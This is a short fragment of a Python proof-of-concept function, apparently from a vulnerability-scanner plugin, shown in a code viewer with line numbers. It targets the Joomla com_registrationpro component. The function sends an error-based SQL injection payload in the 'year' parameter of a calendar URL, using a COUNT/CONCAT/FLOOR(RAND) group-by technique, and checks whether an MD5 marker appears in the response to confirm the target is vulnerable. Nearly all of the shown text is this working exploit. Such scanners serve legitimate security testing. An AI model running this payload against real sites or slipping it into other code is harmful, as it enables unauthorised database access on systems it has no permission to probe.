(url)
| 21 | |
| 22 | |
| 23 | def poc(url): |
| 24 | if '://' not in url: |
| 25 | url = 'http://' + url |
| 26 | for each in iterate_path(url): |
| 27 | plain, cipher = randomMD5(3) |
| 28 | payload = "/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=1 AND (SELECT 7804 FROM(SELECT COUNT(*),CONCAT(0x7176786b71,(MID((IFNULL(CAST(md5({plain}) AS CHAR),0x20)),1,54)),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)".format(plain=plain) |
| 29 | if '?' in each: |
| 30 | continue |
| 31 | target_url = url.rstrip('/') + payload |
| 32 | try: |
| 33 | r = requests.get(target_url, timeout=10) |
| 34 | if cipher in r.content: |
| 35 | return each |
| 36 | except Exception, e: |
| 37 | pass |
| 38 | return False |
nothing calls this directly
no test coverage detected